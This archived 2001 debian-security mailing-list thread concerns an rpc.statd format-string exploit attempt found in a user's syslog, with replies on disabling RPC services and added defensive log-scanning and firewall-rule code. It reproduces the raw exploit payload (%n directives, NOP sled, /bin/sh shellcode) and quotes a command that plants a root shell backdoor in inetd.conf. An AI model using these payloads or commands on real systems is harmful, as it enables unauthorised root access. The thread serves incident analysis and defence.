Re: strange log entry

2001-05-25 Thread Jacob Meuser

On Thu, May 24, 2001 at 05:30:14AM -0800, Ethan Benson wrote:
 On Thu, May 24, 2001 at 05:41:08AM -0700, Jacob Meuser wrote:
  On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
   On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:

BS, when was the last time you installed OpenBSD?  I just did an install
   
   2.5
  That was what, 2 years ago?
 
 1.5 years or so yes, i haven't messed with openbsd in a while, i was going
 to use it for my firewall but there were some problems with it so i
 ditched in favor of debian.  OpenBSD's security reputation is a bit
 exaggerated, with some good admining a linux box can be just as
 secure...

True, proper administration is more important to security than
what OS is run.  To some degree, OpenBSD's reputation may be
somewhat exaggerated, but they do actively smash bugs, and correct
problems in OpenSource code.  They're also the people behind OpenSSH,
so that adds to the hype a bit.

 i was also quite annoyed by its complete lack of upgradability, i
 tried twice in testing to upgrade the dist from one version to another
 it failed and made a mess every time, screw that i don't think much of
 rebuilding a box every 6mo - 1 year just to keep up with the times.  

I just upgraded a server and a firewall/router using the standard
upgrade procedures.  I had no problems.  
It's true that there's nothing like 'apt-get upgrade', but, at least
in my experience, less than an hour every six months is a reasonable
amount of time to spend upgrading.  

  Ah, they probably caught the problem shortly before 2.6 release,
  and didn't have time to fix ftp code, but changing rc.conf was doable.
 
 heh you're almost as cynical as i am ;-)

I like to call it practical ;)
 
  Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat,
  sshd and identd are enabled by default.  
 
 hmm maybe my memory is funky but that seems like more than i saw out
 of the box... it still had more crap running than i prefer. 

Yes, you should always disable things you don't use.  That's one thing
I like about OpenBSD, they assume you're not going to use much, and 
if you are, then you should know how to enable it.  There's no point
in starting a service before you've had a chance to look at the config 
file.
 
  Like I said, I didn't want to start a discussion about OpenBSD vs Linux,
  I have seen posts from you saying that you like some features of OpenBSD,
  /sbin/nologin for example.
 
 it's a nice system, i like the simplicity and clean design, it's like
 debian in that.  but upgrading the whole thing is simply impossible.
 well maybe grabbing all source from CVS and doing make world will do
 it, but i didn't try it.  the `official' upgrade system is broken.  
 
  I'm just curious why the 'r' tools are apparently so vulnerable in 
  Linux.  If the OpenBSD folks are willing to risk credibility by 
  claiming that their default install has no remote holes, while
  enabling portmap and rstatd by default, why can't Linux users feel 
  safe running those daemons also?
 
 well openbsd claims to have audited everything they enable by default,
 and everything in their base install (which is VERY lean).  from

I have to disagree with this.  Sure you don't get zope, but you get
sendmail, bind, apache, perl, gcc, lynx, ftpd, ftp, ppp, pppd, sh, ksh, 
csh, egrep, sed, less, more, vi, ed, ex, mg ...  Pretty much everything
you need, if not the most extravagant.  Oh yeah, and X also.  The main
difference, IMHO, is that OpenBSD is more current than Debian, or
just about any stable distro.  Look what's in 2.9 -
http://www.openbsd.org/29.html

 reading bugtraq they seem to have a very bad habit about fixing bugs
 quietly and not bothering to send patches upstream, instead posting
 sarcastic messages along the lines of `oh yeah we fixed that in CVS 3
 years ago' (check out the recent joe DEADJOE vulnerability for an
 example). 

Well, you /could/ just check their sources.  They're on the web you 
know.  http://www.openbsd.org/cgi-bin/cvsweb/  They're published
in public, what more do you really want?  It's pretty easy to find
out when and who made changes to a CVS repo, and they're pretty
particular about proper Changelogs.
 
 of course i could be wrong, and all upstream developers are just
 blackholing openbsd security patches. 
 
Well, to some degree this may be true.  Sometimes the OpenBSD
developers, Theo de Raadt in particular, kind of come off as rude
and pretentious.  Just check the misc@openbsd mailing list archives
for some entertaining flames :)

[EMAIL PROTECTED]


--  
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: strange log entry

2001-05-25 Thread Ethan Benson

On Fri, May 25, 2001 at 01:55:35AM -0700, Jacob Meuser wrote:
 
 Well, you /could/ just check their sources.  They're on the web you 
 know.  http://www.openbsd.org/cgi-bin/cvsweb/  They're published
 in public, what more do you really want?  It's pretty easy to find
 out when and who made changes to a CVS repo, and they're pretty
 particular about proper Changelogs.

yes and how many distros/OSes, and other possible places are there
where a given piece of Free software is living in CVS, having bugs
fixed.  can you really expect the upstream maintainer to spend all
their time running around checking changelogs and cvs diffs of x many
different CVS repos?  

do you really expect some upstream maintainer to regularly check all
changes to his program in:

OpenBSD's CVS
FreeBSD's CVS
NetBSD's CVS
Redhat's rpm patches
Mandrake's rpm patches
Debian's patches
...
...
...
...

i suspect they don't have time for that.  

when debian fixes a serious bug in a package they send the patch
upstream, it's just common courtesy.  a courtesy OpenBSD seems to
lack, but then that gives them an edge and opportunity to brag when the
bug is found by everyone else eventually.  

 Well, to some degree this may be true.  Sometimes the OpenBSD
 developers, Theo de Raadt in particular, kind of come off as rude
 and pretentious.  Just check the misc@openbsd mailing list archives
 for some entertaining flames :)

oh i am well aware of Theo's legendary reputation for being a complete
bastard, but i don't really think the samba maintainer is going to
leave a security hole unpatched just because Theo has an abrasive
personality... 

-- 
Ethan Benson
http://www.alaska.net/~erbenson/



Re: strange log entry

2001-05-24 Thread Wade Richards

Yep, it's a security problem.  Someone is trying to hack into your system 
using one of many known security bugs in the rpc daemon.

If you don't need the rpc stuff running, then just disable it (better yet, 
uninstall it).  If you really do need it running, but it's only used 
locally, then I suggest you use ipchains to drop any packets targeted to 
port 111.   But best is to simply remove it entirely.

--- Wade
 
On Thu, 24 May 2001 05:07:33 GMT, [EMAIL PROTECTED] writes:
Heya :)
 
I was running a 'tail -f' on my /var/log/messages and this entry appeared while
I was connected to the internet:

May 24 10:08:11 noogies -- MARK --
May 24 10:20:34 noogies
May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for

and it has me worried it may be a security issue. I'm very new to linux, and
newer again to debian, and at this stage I really don't have a clue as to what
the above log entry is trying to tell me...

Any input or comments would be very appreciated :)

Thank you

- trevs







-- 
 /\  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
 \ /   ASCII Ribbon Campaign| Wade Richards --- [EMAIL PROTECTED] 
  X   - NO HTML/RTF in e-mail   | Fight SPAM!  Join CAUCE.
 / \  - NO Word docs in e-mail  | See http://www.cauce.org/ for details.







Re: strange log entry

2001-05-24 Thread Jim Breton

On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote:
 the last two i understand, as well as domain, but sunrpc and 1171?

man fuser.  Look for the -n option.


 i've cleaned up everything i can think of, but X11R6 says it still needs the
 RPC packages.

Why does/would X11 require RPC?






Re: strange log entry

2001-05-24 Thread Jacob Meuser

On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
 Hello,
 
 Well first off WHY are you running the rpc stuff?  (i.e. I can root a redhat
 6.x box in under 30 seconds with a rpc exploit from a clean install)  Turn
 that stuff OFF.
 
Not to start a thread discussing OSes, but ...

OpenBSD ships with rstatd and ruserd enabled by default and according to
http://www.openbsd.org/

Four years without a remote hole in the default install!

Which begs the question, especially since the *BSD's release their
sources under BSD style licenses, why does rpc remain a security problem
in Linux?  Is it the kernel?  Is it the rpc code?

Simply curious,
[EMAIL PROTECTED]






Re: strange log entry

2001-05-24 Thread Ethan Benson

On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
 
 BS, when was the last time you installed OpenBSD?  I just did an install

2.5

 today.  I guarantee portmap, ruserd, and rstatd are enabled by default,
 as the installer doesn't even ask what you want to activate, and these
 programs are part of the base tarball. 

in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure
rstatd was not.  2.6 i think disabled ftpd by default, shortly
thereafter a root hole was found in openbsd's ftpd and they promptly
said `ftpd is not enabled in the default install of 2.6 (or whatever)
and thus there is no root hole in our default install'  

-- 
Ethan Benson
http://www.alaska.net/~erbenson/



Re: strange log entry

2001-05-24 Thread Noah L. Meyerhans

On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:
 OpenBSD ships with rstatd and ruserd enabled by default and according to
 http://www.openbsd.org/
 
 Four years without a remote hole in the default install!
 
 Which begs the question, especially since the *BSD's release their
 sources under BSD style licenses, why does rpc remain a security problem
 in Linux?  Is it the kernel?  Is it the rpc code?

This is not the same stuff at all.  They ship with rstatd turned on, not
rpc.statd.  They are completely different.  rpc.statd is used by nfs.
rstatd is used by the rstat program, which tells you info about machines
on your network.  It is like running 'uptime' on all your machines at
once.

noah

-- 
 ___
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html 




RE: strange log entry

2001-05-24 Thread Ed Street

Hello,

that's simple ;)  If they were stable/non-exploitable then we'd be using rpc
in place of ssh ;)

Ed


-Original Message-
From: Jacob Meuser [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 8:41 AM
To: [EMAIL PROTECTED]
Subject: Re: strange log entry


On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
 On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
  
  BS, when was the last time you installed OpenBSD?  I just did an install

 2.5
That was what, 2 years ago?

  today.  I guarantee portmap, ruserd, and rstatd are enabled by default,
  as the installer doesn't even ask what you want to activate, and these
  programs are part of the base tarball.

 in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure
 rstatd was not.  2.6 i think disabled ftpd by default, shortly
 thereafter a root hole was found in openbsd's ftpd and they promptly
 said `ftpd is not enabled in the default install of 2.6 (or whatever)
 and thus there is no root hole in our default install'

Ah, they probably caught the problem shortly before 2.6 release,
and didn't have time to fix ftp code, but changing rc.conf was doable.
Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat,
sshd and identd are enabled by default.
Like I said, I didn't want to start a discussion about OpenBSD vs Linux,
I have seen posts from you saying that you like some features of OpenBSD,
/sbin/nologin for example.

I'm just curious why the 'r' tools are apparently so vulnerable in
Linux.  If the OpenBSD folks are willing to risk credibility by
claiming that their default install has no remote holes, while
enabling portmap and rstatd by default, why can't Linux users feel
safe running those daemons also?

[EMAIL PROTECTED]








Re: strange log entry

2001-05-24 Thread Mirek Kwasniak

On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote:
 On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote:
  the last two i understand, as well as domain, but sunrpc and 1171?
 
 man fuser.  Look for the -n option.

... or look for -p option of netstat :)

Mirek






strange log entry

2001-05-24 Thread trev26
Heya :)
 
I was running a 'tail -f' on my /var/log/messages and this entry appeared while
I was connected to the internet:

May 24 10:08:11 noogies -- MARK --
May 24 10:20:34 noogies
May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
May 24 10:20:34 noogies
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ

and it has me worried it may be a security issue. I'm very new to linux, and
newer again to debian, and at this stage I really don't have a clue as to what
the above log entry is trying to tell me...

Any input or comments would be very appreciated :)

Thank you

- trevs
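The `%8x...%n` run and the string of `\220` bytes (0x90, the x86 NOP) in that "hostname" are the signature of a format-string exploit attempt against rpc.statd. As an added example, not code from the thread, here is a small detector for such entries: it parses syslog lines, picks out rpc.statd's "gethostbyname error for" messages and flags arguments that carry printf directives (`%n` above all) or a NOP sled. The log sample is constructed, modelled on the entry above with the payload shortened and the address bytes written as octal escapes.

```python
import re
from collections import namedtuple

# Constructed sample, modelled on the entry quoted in the thread (same host, pid
# and timestamps).  The payload is shortened, and the address bytes that the
# terminal showed as "^X" plus three high-bit Latin-1 characters are written the
# way sysklogd escapes non-printable bytes, as three-digit octal.  \220 is 0x90,
# the x86 NOP instruction, so a long run of it is a NOP sled.
SAMPLE_LOG = r"""May 24 10:08:11 noogies -- MARK --
May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X\367\377\277^X\367\377\277%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220
May 24 10:21:02 noogies /sbin/rpc.statd[151]: gethostbyname error for nfs-client.example.invalid
May 24 10:25:40 noogies sshd[412]: Accepted password for alice from 192.0.2.10 port 40022
"""

# "Mon DD HH:MM:SS host program[pid]: message" (the pid part is optional in syslog)
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\s\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
STATD_MARKER = "gethostbyname error for "
# printf-style conversions: %8x, %236x, %n, %s, %p, %lld ...
DIRECTIVE_RE = re.compile(r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l)?[diouxXeEfgGcspn]")
OCTAL_RE = re.compile(r"\\[0-7]{3}")  # sysklogd's escape for a non-printable byte

Finding = namedtuple("Finding", "ts host pid directives writes nops verdict")


def classify(ts, host, pid, hostname_arg):
    """Judge the string rpc.statd failed to resolve; a real hostname has none of this."""
    directives = DIRECTIVE_RE.findall(hostname_arg)
    writes = [d for d in directives if d.endswith("n")]   # %n writes to memory
    nops = OCTAL_RE.findall(hostname_arg).count(r"\220")  # length of the NOP sled
    if writes:
        verdict = "format-string exploit attempt (%n write primitive present)"
    elif len(directives) >= 4 or nops >= 8:
        verdict = "suspicious: printf directives or NOP sled in a hostname"
    else:
        return None
    return Finding(ts, host, pid, len(directives), len(writes), nops, verdict)


def scan_syslog(text):
    """Return a Finding for every rpc.statd gethostbyname error that looks hostile."""
    findings = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        # Lines without a "program[pid]:" tag (the -- MARK -- line, and the
        # continuation line the payload's embedded newline produced) are skipped.
        if not m or "statd" not in m.group("prog"):
            continue
        msg = m.group("msg")
        if not msg.startswith(STATD_MARKER):
            continue
        f = classify(m.group("ts"), m.group("host"), m.group("pid"),
                     msg[len(STATD_MARKER):])
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_syslog(SAMPLE_LOG):
        print(f"{f.ts} {f.host} rpc.statd[{f.pid}]: {f.verdict} "
              f"({f.directives} directives, {f.writes} %n, NOP sled {f.nops} bytes)")
```

As hpknight notes further down the thread, an entry like this means the attempt was logged rather than succeeding silently; a host that no longer runs rpc.statd produces no such line at all.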




RE: strange log entry

2001-05-24 Thread Ed Street
Hello,

Well first off WHY are you running the rpc stuff?  (i.e. I can root a redhat
6.x box in under 30 seconds with a rpc exploit from a clean install)  Turn
that stuff OFF.

Ed


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 1:08 AM
To: debian-security@lists.debian.org
Subject: strange log entry


Heya :)

I was running a 'tail -f' on my /var/log/messages and this entry appeared while
I was connected to the internet:

May 24 10:08:11 noogies -- MARK --
May 24 10:20:34 noogies
May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for

and it has me worried it may be a security issue. I'm very new to linux, and
newer again to debian, and at this stage I really don't have a clue as to what
the above log entry is trying to tell me...

Any input or comments would be very appreciated :)

Thank you

- trevs






Re: strange log entry

2001-05-24 Thread Peter Cordes
On Wed, May 23, 2001 at 10:58:43PM -0700, Wade Richards wrote:
 Yep, it's a security problem.  Someone is trying to hack into your system 
 using one of many known security bugs in the rpc daemon.
 
 If you don't need the rpc stuff running, then just disable it (better yet, 
 uninstall it).  If you really do need it running, but it's only used 
 locally, then I suggest you use ipchains to drop any packets targeted to 
 port 111.   But best is to simply remove it entirely.

 That only blocks portmap.  Other UDP services can be found with a UDP port
scan by e.g. nmap.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , ns.ca)

The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces! -- Plautus, 200 BCE
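To act on Peter's caveat, an added example (not from the thread): it parses `rpcinfo -p` output to list every port the registered RPC services listen on, shows which of them stay reachable if only port 111 is filtered, and emits an ipchains DENY rule for each on the external interface. The rpcinfo output and the `ppp0` interface name are constructed assumptions.

```python
import re

# Constructed `rpcinfo -p` output for a box running portmap and rpc.statd
# (statd registers with the portmapper as program 100024, "status").  The
# port statd lands on is assigned at start-up, so it differs per host and reboot.
SAMPLE_RPCINFO = """\
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp   1024  status
    100024    1   tcp   1024  status
"""

RPC_LINE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")


def rpc_ports(rpcinfo_output):
    """(proto, port, name) for every registration, one entry per proto/port pair."""
    found = {}
    for line in rpcinfo_output.splitlines():
        m = RPC_LINE.match(line)
        if m:
            prog, _vers, proto, port, name = m.groups()
            found.setdefault((proto, int(port)), name or prog)
    return sorted((proto, port, name) for (proto, port), name in found.items())


def still_reachable_if_only_111_filtered(rpcinfo_output):
    """Peter's point: dropping port 111 hides the portmapper, not the services."""
    return [entry for entry in rpc_ports(rpcinfo_output) if entry[1] != 111]


def ipchains_rules(rpcinfo_output, iface="ppp0"):
    """One DENY rule per registered port on the external interface (assumed ppp0);
    clients on lo or a LAN interface are unaffected."""
    return [
        f"ipchains -A input -i {iface} -p {proto} -d 0.0.0.0/0 {port} -j DENY   # {name}"
        for proto, port, name in rpc_ports(rpcinfo_output)
    ]


if __name__ == "__main__":
    print("reachable after blocking only 111:",
          still_reachable_if_only_111_filtered(SAMPLE_RPCINFO))
    print("\n".join(ipchains_rules(SAMPLE_RPCINFO)))
```

Because statd's port is handed out at start-up, the rules have to be regenerated after every restart; a default-deny input policy on the external interface avoids that chase, and removing the RPC services, as Wade suggests, avoids it entirely.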



Re: strange log entry

2001-05-24 Thread hpknight
Definitely a security problem.  But the fact that you actually saw
something is good news .. it means the exploit didn't work.  If it had
worked, the thing would just die quietly and not log anything.  Better off
without rpc anyway, unless you *need* it for NFS or something
similar.  And if you really need it, make sure it's firewalled.

I get about 30 similar rpc.statd scans every day on most of my
machines.  Glad they're not running rpc.statd :)

--Henry


On Thu, 24 May 2001 [EMAIL PROTECTED] wrote:

 Heya :)
  
 I was running a 'tail -f' on my /var/log/messages and this entry appeared while
 I was connected to the internet:
 
 May 24 10:08:11 noogies -- MARK --
 May 24 10:20:34 noogies
 May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
 
 and it has me worried it may be a security issue. I'm very new to linux, and
 newer again to debian, and at this stage I really don't have a clue as to what
 the above log entry is trying to tell me...
 
 Any input or comments would be very appreciated :)
 
 Thank you
 
 - trevs
 
 
 
 



Re: strange log entry

2001-05-24 Thread Ethan Benson
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:
 On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
  Hello,
  
  Well first off WHY are you running the rpc stuff?  (i.e. I can root a redhat
  6.x box in under 30 seconds with a rpc exploit from a clean install)  Turn
  that stuff OFF.
  
 Not to start a thread discussing OSes, but ...
 
 OpenBSD ships with rstatd and ruserd enabled by default and according to
 http://www.openbsd.org/
 
 Four years without a remote hole in the default install!
  
 Which begs the question, especially since the *BSD's release their
 sources under BSD style licenses, why does rpc remain a security problem
 in Linux?  Is it the kernel?  Is it the rpc code?

because that underlined portion is the key here, OpenBSD keeps the rpc
stuff turned off by default, thus even if a root hole is found in a
rpc service (other than portmap) openbsd does not consider that a
`remote hole in the *default install*'  they are quick to mention this
every time a hole is found in any daemon OpenBSD ships with but leaves
off by default.  

-- 
Ethan Benson
http://www.alaska.net/~erbenson/




Re: strange log entry

2001-05-24 Thread Jacob Meuser
On Thu, May 24, 2001 at 12:43:40AM -0800, Ethan Benson wrote:
 On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:
  On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
   Hello,
   
   Well first off WHY are you running the rpc stuff?  (i.e. I can root a 
   redhat
   6.x box in under 30 seconds with a rpc exploit from a clean install)  Turn
   that stuff OFF.
   
  Not to start a thread discussing OSes, but ...
  
  OpenBSD ships with rstatd and ruserd enabled by default and according to
  http://www.openbsd.org/
  
  Four years without a remote hole in the default install!
   
  Which begs the question, especially since the *BSD's release their
  sources under BSD style licenses, why does rpc remain a security problem
  in Linux?  Is it the kernel?  Is it the rpc code?
 
 because that underlined portion is the key here, OpenBSD keeps the rpc
 stuff turned off by default, thus even if a root hole is found in a
 rpc service (other than portmap) openbsd does not consider that a
 `remote hole in the *default install*'  they are quick to mention this
 every time a hole is found in any daemon OpenBSD ships with but leaves
 off by default.  

BS, when was the last time you installed OpenBSD?  I just did an install
today.  I guarantee portmap, ruserd, and rstatd are enabled by default,
as the installer doesn't even ask what you want to activate, and these
programs are part of the base tarball. 

[EMAIL PROTECTED]
 



Re: strange log entry

2001-05-24 Thread Ethan Benson
On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
 
 BS, when was the last time you installed OpenBSD?  I just did an install

2.5

 today.  I guarantee portmap, ruserd, and rstatd are enabled by default,
 as the installer doesn't even ask what you want to activate, and these
 programs are part of the base tarball. 

in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure
rstatd was not.  2.6 i think disabled ftpd by default, shortly
thereafter a root hole was found in openbsd's ftpd and they promptly
said `ftpd is not enabled in the default install of 2.6 (or whatever)
and thus there is no root hole in our default install'  

-- 
Ethan Benson
http://www.alaska.net/~erbenson/




Re: strange log entry

2001-05-24 Thread Jacob Meuser
On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
 On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
  
  BS, when was the last time you installed OpenBSD?  I just did an install
 
 2.5
That was what, 2 years ago?
 
  today.  I guarantee portmap, ruserd, and rstatd are enabled by default,
  as the installer doesn't even ask what you want to activate, and these
  programs are part of the base tarball. 
 
 in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure
 rstatd was not.  2.6 i think disabled ftpd by default, shortly
 thereafter a root hole was found in openbsd's ftpd and they promptly
 said `ftpd is not enabled in the default install of 2.6 (or whatever)
 and thus there is no root hole in our default install'  

Ah, they probably caught the problem shortly before 2.6 release,
and didn't have time to fix ftp code, but changing rc.conf was doable.
Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat,
sshd and identd are enabled by default.  
Like I said, I didn't want to start a discussion about OpenBSD vs Linux,
I have seen posts from you saying that you like some features of OpenBSD,
/sbin/nologin for example.

I'm just curious why the 'r' tools are apparently so vulnerable in 
Linux.  If the OpenBSD folks are willing to risk credibility by 
claiming that their default install has no remote holes, while
enabling portmap and rstatd by default, why can't Linux users feel 
safe running those daemons also?

[EMAIL PROTECTED] 



Re: strange log entry

2001-05-24 Thread Ethan Benson
On Thu, May 24, 2001 at 05:41:08AM -0700, Jacob Meuser wrote:
 On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
  On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
   
   BS, when was the last time you installed OpenBSD?  I just did an install
  
  2.5
 That was what, 2 years ago?

1.5 years or so yes, i haven't messed with openbsd in a while, i was going
to use it for my firewall but there were some problems with it so i
ditched in favor of debian.  OpenBSD's security reputation is a bit
exaggerated, with some good admining a linux box can be just as
secure...

i was also quite annoyed by its complete lack of upgradability, i
tried twice in testing to upgrade the dist from one version to another
it failed and made a mess every time, screw that i don't think much of
rebuilding a box every 6mo - 1 year just to keep up with the times.  

 Ah, they probably caught the problem shortly before 2.6 release,
 and didn't have time to fix ftp code, but changing rc.conf was doable.

heh you're almost as cynical as i am ;-)

 Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat,
 sshd and identd are enabled by default.  

hmm maybe my memory is funky but that seems like more than i saw out
of the box... it still had more crap running than i prefer. 

 Like I said, I didn't want to start a discussion about OpenBSD vs Linux,
 I have seen posts from you saying that you like some features of OpenBSD,
 /sbin/nologin for example.

it's a nice system, i like the simplicity and clean design, it's like
debian in that.  but upgrading the whole thing is simply impossible.
well maybe grabbing all source from CVS and doing make world will do
it, but i didn't try it.  the `official' upgrade system is broken.  

 I'm just curious why the 'r' tools are apparently so vulnerable in 
 Linux.  If the OpenBSD folks are willing to risk credibility by 
 claiming that their default install has no remote holes, while
 enabling portmap and rstatd by default, why can't Linux users feel 
 safe running those daemons also?

well openbsd claims to have audited everything they enable by default,
and everything in their base install (which is VERY lean).  from
reading bugtraq they seem to have a very bad habit of fixing bugs
quietly and not bothering to send patches upstream, instead posting
sarcastic messages along the lines of `oh yeah we fixed that in CVS 3
years ago' (check out the recent joe DEADJOE vulnerability for an
example). 

of course i could be wrong, and all upstream developers are just
blackholing openbsd security patches. 

-- 
Ethan Benson
http://www.alaska.net/~erbenson/




Re: strange log entry

2001-05-24 Thread David Ehle
On Thu, 24 May 2001 [EMAIL PROTECTED] wrote:

What you have there is someone trying to do a buffer overflow attack on
rpc.statd.  The idea is that once the buffer is blown, they will get a
chance to issue a command as root.  In the attack that was attempted on one
of the systems I was given to supervise the last part of the garbage sent
to the buffer was:
/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i  
/etc/inetd.conf;killall -HUP inetd

This, if it had succeeded,  would have created a new line in inetd.conf
and restarted inetd.  Then they would have come in on port 9704 to a nice
root shell and did whatever they wanted to do, probably remove that line,
edit my logs, install a root kit, and leave as quietly as possible.

Luckily this time it didn't work and left some dirty footprints as
evidence.

As stated earlier the best way to deal with this, if you don't need rpc
services running for NFS/NIS or something similar is to just shut
portmapper and all the other RPC services down and remove them from your
start up scripts.  I was curious however, so I just made sure tcp wrapper
-tcpd - covered portmapper and added portmap: ALL to my /etc/hosts.deny
file so I could gather some IP numbers via TCPD logging. Figure I should
let the networks assigned the IPs know that some of their machines are
compromised/being used for cracking.

While setting up a firewall as others have previously suggested is a dang
good idea, don't forget to use tcp wrappers also, if for only the logging.
For the security conscious, or the inexperienced a good first step right
after first booting a machine is to type su -c echo ALL:ALL 
/etc/hosts.deny root . I'd do that before even connecting to the network.
Later if you must you can relax it a bit, but it's a good place to start.

However, now that you have seen this one attack, you should probably go
over your logs and system accounting files with a fine tooth comb and see
if anyone else might have succeeded before or after ;)

This is a far from exhaustive list but try:
looking for any breaks in your log files or unexpected daemon restarts.
examine your crontabs to see if there are any jobs you didn't put there.
check your /etc/passwd file for any unrecognized users or strange shells.
check inetd.conf for any odd entries.
run a find / -m x to look for new or edited files. see if there are any
there that you don't remember editing. Look for changed permissions too.
download a root kit detector and see if anyone has already left you a
present.

again this is just the start ;)

I apologize to folks who consider this all old-news, but trevs was brave
enough to admit he didn't know, so there are probably a few others lurking
in the same boat ;)

Good luck!

   David.
  Heya :)

 I was running a 'tail -f' on my /var/log/messages and this entry appeared 
 while
 I was connected to the internet:

 May 24 10:08:11 noogies -- MARK --
 May 24 10:20:34 noogies
 May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
 ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
 May 24 10:20:34 noogies
 Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ

 and it has me worried it may be a security issue. I'm very new to linux, and
 newer again to debian, and at this stage I really don't have a clue as to what
 the above log entry is trying to tell me...

 Any input or comments would be very appreciated :)

 Thank you

 - trevs



